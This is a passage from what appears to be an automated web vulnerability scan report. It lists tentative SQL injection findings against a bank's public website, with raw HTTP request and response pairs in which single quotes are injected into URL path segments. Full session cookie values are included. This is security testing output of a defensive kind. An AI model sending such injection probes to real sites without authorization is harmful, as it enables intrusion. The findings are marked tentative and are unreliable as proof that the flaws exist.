Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:20 GMT
location: http://www.bbt.com/bbt/about%27%27/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 134
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about%27%27/">here</a>.</body>

1.33. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

Request 1

GET /bbt'/about/privacyandsecurity/completeclientprotection/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:41 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/about/privacyandsecurity/completeclientprotection/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:41 GMT
location: http://www.bbt.com/bbt/%27%27/about/privacyandsecurity/completeclientprotection/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 191
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/about/privacyandsecurity/completeclientprotection/default.html">here</a>.</body>

1.34. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

Request 1

GET /bbt/about'/privacyandsecurity/completeclientprotection/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:47 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about''/privacyandsecurity/completeclientprotection/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:48 GMT
location: http://www.bbt.com/bbt/about%27%27/privacyandsecurity/completeclientprotection/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 190
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about%27%27/privacyandsecurity/completeclientprotection/default.html">here</a>.</body>

1.35. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

Request 1

GET /bbt/about/privacyandsecurity'/completeclientprotection/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:54 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about/privacyandsecurity''/completeclientprotection/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:54 GMT
location: http://www.bbt.com/bbt/about/privacyandsecurity%27%27/completeclientprotection/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 190
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity%27%27/completeclientprotection/default.html">here</a>.</body>

1.36. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/about/privacyandsecurity/completeclientprotection'/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:00 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about/privacyandsecurity/completeclientprotection''/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:00 GMT
location: http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection%27%27/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 190
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity/completeclientprotection%27%27/default.html">here</a>.</body>

1.37. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/completeclientprotection/default.html

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/about/privacyandsecurity/completeclientprotection/default.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:05 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about/privacyandsecurity/completeclientprotection/default.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:05 GMT
location: http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 190
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity/completeclientprotection/default.html%27%27">here</a>.</body>

1.38. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/onlinebankinglogin.html

Issue detail

Request 1

GET /bbt'/about/privacyandsecurity/onlinebankinglogin.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:51 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/about/privacyandsecurity/onlinebankinglogin.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:51 GMT
location: http://www.bbt.com/bbt/%27%27/about/privacyandsecurity/onlinebankinglogin.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 177
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/about/privacyandsecurity/onlinebankinglogin.html">here</a>.</body>

1.39. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/onlinebankinglogin.html

Issue detail

Request 1

GET /bbt/about'/privacyandsecurity/onlinebankinglogin.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:11 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about''/privacyandsecurity/onlinebankinglogin.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:11 GMT
location: http://www.bbt.com/bbt/about%27%27/privacyandsecurity/onlinebankinglogin.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 176
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about%27%27/privacyandsecurity/onlinebankinglogin.html">here</a>.</body>

1.40. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/onlinebankinglogin.html

Issue detail

Request 1

GET /bbt/about/privacyandsecurity'/onlinebankinglogin.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:37 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about/privacyandsecurity''/onlinebankinglogin.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:38 GMT
location: http://www.bbt.com/bbt/about/privacyandsecurity%27%27/onlinebankinglogin.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 176
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity%27%27/onlinebankinglogin.html">here</a>.</body>

1.41. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/about/privacyandsecurity/onlinebankinglogin.html

Issue detail

Request 1

GET /bbt/about/privacyandsecurity/onlinebankinglogin.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:46 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about/privacyandsecurity/onlinebankinglogin.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:47 GMT
location: http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 176
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity/onlinebankinglogin.html%27%27">here</a>.</body>

1.42. http://www.bbt.com/bbt/careers/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/careers/

Issue detail

Request 1

GET /bbt'/careers/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

Request 2

GET /bbt''/careers/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:03 GMT
location: http://www.bbt.com/bbt/%27%27/careers/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 137
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/careers/">here</a>.</body>

